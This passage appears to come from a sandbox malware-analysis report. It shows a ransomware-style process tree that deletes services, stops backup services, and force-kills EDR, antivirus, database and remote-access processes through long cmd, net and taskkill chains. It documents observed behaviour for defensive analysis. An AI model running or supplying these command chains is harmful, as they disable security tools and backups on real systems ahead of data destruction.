      sc delete CASLicenceServer
      4⤵
      PID:5996
  - - C:\Windows\SysWOW64\sc.exe
      sc delete semwebsrv
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLService
      4⤵
      PID:6340
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TbossSystem
      4⤵
      PID:288
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ErpEnvSvc
      4⤵
      PID:3236
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.DispatchService
      4⤵
      PID:6412
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.UpdateService
      4⤵
      PID:2900
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Config.WindowsService
      4⤵
      PID:5692
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.DataCenterService
      4⤵
      PID:5164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.SchedulingService
      4⤵
      PID:7064
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Setup.InstallService
      4⤵
      Launches sc.exe
      PID:6924
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MysoftUpdate
      4⤵
      PID:7184
  - - C:\Windows\SysWOW64\sc.exe
      sc delete edr_monitor
      4⤵
      PID:7340
  - - C:\Windows\SysWOW64\sc.exe
      sc delete abs_deployer
      4⤵
      PID:1456
  - - C:\Windows\SysWOW64\sc.exe
      sc delete savsvc
      4⤵
      Launches sc.exe
      PID:7348
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ShareBoxMonitorService
      4⤵
      PID:7476
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ShareBoxService
      4⤵
      PID:7536
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CloudExchangeService
      4⤵
      PID:4576
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8WorkerService2"
      4⤵
      Launches sc.exe
      PID:5452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CIS
      4⤵
      PID:4956
  - - C:\Windows\SysWOW64\sc.exe
      sc delete EASService
      4⤵
      PID:2980
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KICkSvr
      4⤵
      PID:956
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "OSP Service"
      4⤵
      Launches sc.exe
      PID:4116
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
    3⤵
    PID:6732
  - - C:\Windows\SysWOW64\net.exe
      net stop HaoZipSvc
      4⤵
      PID:5828
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop HaoZipSvc
        5⤵
        
        PID:6708
  - - C:\Windows\SysWOW64\net.exe
      net stop "igfxCUIService2.0.0.0"
      4⤵
      PID:2588
  - - C:\Windows\SysWOW64\net.exe
      net stop xenlite
      4⤵
      PID:5556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop xenlite
        5⤵
        
        PID:5960
  - - C:\Windows\SysWOW64\net.exe
      net stop XenSvc
      4⤵
      PID:6660
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.2
      4⤵
      PID:5432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.2
        5⤵
        
        PID:6452
  - - C:\Windows\SysWOW64\net.exe
      net stop "Synology Drive VSS Service x64"
      4⤵
      PID:6824
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
        5⤵
        
        PID:7084
  - - C:\Windows\SysWOW64\net.exe
      net stop DellDRLogSvc
      4⤵
      PID:6812
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DellDRLogSvc
        5⤵
        
        PID:6740
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdGuardianDeafaultInstance
      4⤵
      PID:5416
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
        5⤵
        
        PID:6056
  - - C:\Windows\SysWOW64\net.exe
      net stop JWEM3DBAUTORun
      4⤵
      PID:7516
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWEM3DBAUTORun
        5⤵
        
        PID:7508
  - - C:\Windows\SysWOW64\net.exe
      net stop JWRinfoClientService
      4⤵
      PID:7672
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWRinfoClientService
        5⤵
        
        PID:2352
  - - C:\Windows\SysWOW64\net.exe
      net stop JWService
      4⤵
      PID:3936
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWService
        5⤵
        
        PID:432
  - - C:\Windows\SysWOW64\net.exe
      net stop Realtek11nSU
      4⤵
      PID:6236
  - - C:\Windows\SysWOW64\net.exe
      net stop Service2
      4⤵
      PID:4848
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Service2
        5⤵
        
        PID:7096
  - - C:\Windows\SysWOW64\net.exe
      net stop RapidRecoveryAgent
      4⤵
      PID:6352
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdServerDefaultInstance
      4⤵
      PID:5700
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
        5⤵
        
        PID:7936
  - - C:\Windows\SysWOW64\net.exe
      net stop AdobeARMservice
      4⤵
      PID:5680
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCatalogSvc
      4⤵
      PID:3312
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc
        5⤵
        
        PID:7852
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeanBackupSvc
      4⤵
      PID:6436
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeanBackupSvc
        5⤵
        
        PID:7188
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamTransportSvc
      4⤵
      PID:6400
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc
        5⤵
        
        PID:7636
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdAppService1300
      4⤵
      PID:6928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1300
        5⤵
        
        PID:6444
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdTaskService1300
      4⤵
      PID:8004
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1300
        5⤵
        
        PID:5304
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdUpgradeService1300
      4⤵
      PID:7352
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
        5⤵
        
        PID:7772
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdWebService1300
      4⤵
      PID:6132
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdWebService1300
        5⤵
        
        PID:4596
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamNFSSvc
      4⤵
      PID:1408
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc
        5⤵
        
        PID:7828
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamDeploySvc
      4⤵
      PID:6232
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploySvc
        5⤵
        
        PID:3648
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
    3⤵
    PID:5932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSDS.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7136
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld.exe /F
      4⤵
      PID:5720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer_Service.exe /F
      4⤵
      PID:5264
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer.exe /F
      4⤵
      PID:5648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CasLicenceServer.exe /F
      4⤵
      PID:4388
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_w32.exe /F
      4⤵
      PID:3564
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_x64.exe /F
      4⤵
      PID:6876
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rdm.exe /F
      4⤵
      PID:5184
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRT.exe /F
      4⤵
      PID:7500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRTPortable.exe /F
      4⤵
      PID:3884
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBox.exe /F
      4⤵
      PID:4616
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSVC.exe /F
      4⤵
      PID:6240
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBoxVM.exe /F
      4⤵
      PID:5720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM abs_deployer.exe /F
      4⤵
      PID:1848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_monitor.exe /F
      4⤵
      Kills process with taskkill
      PID:5908
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfupdatemgr.exe /F
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ipc_proxy.exe /F
      4⤵
      PID:1164
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_agent.exe /F
      4⤵
      PID:8016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_sec_plan.exe /F
      4⤵
      PID:7956
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfavsvc.exe /F
      4⤵
      PID:6108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F
      4⤵
      PID:5944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxService.exe /F
      4⤵
      Kills process with taskkill
      PID:3832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchangeService.exe /F
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchange.NodeService.ein /F
      4⤵
      PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"
    3⤵
    PID:6872
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExec.exe /F
      4⤵
      PID:6060
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Att.exe /F
      4⤵
      PID:64
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mdm.exe /F
      4⤵
      PID:7276
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BackupExecManagementService.exe /F
      4⤵
      Kills process with taskkill
      PID:3428
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bengine.exe /F
      4⤵
      PID:4504
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM benetns.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6884
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beserver.exe /F
      4⤵
      PID:6296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM pvlsvr.exe /F
      4⤵
      PID:6892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM bedbg.exe /F
      4⤵
      PID:7664
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:1920
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:5864
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM beremote.exe /F
      4⤵
      PID:5368
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RemoteAssistProcess.exe /F
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarMoniService.exe /F
      4⤵
      PID:3904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGameSrv.exe /F
      4⤵
      PID:6496
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarCMService.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TsService.exe /F
      4⤵
      PID:6992
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GoodGame.exe /F
      4⤵
      PID:7560
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BarServerView.exe /F
      4⤵
      PID:2520
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IcafeServicesTray.exe /F
      4⤵
      PID:3408
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM BsAgent_0.exe /F
      4⤵
      Kills process with taskkill
      PID:5004
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ControlServer.exe /F
      4⤵
      Kills process with taskkill
      PID:6460
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DisklessServer.exe /F
      4⤵
      PID:4184
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM 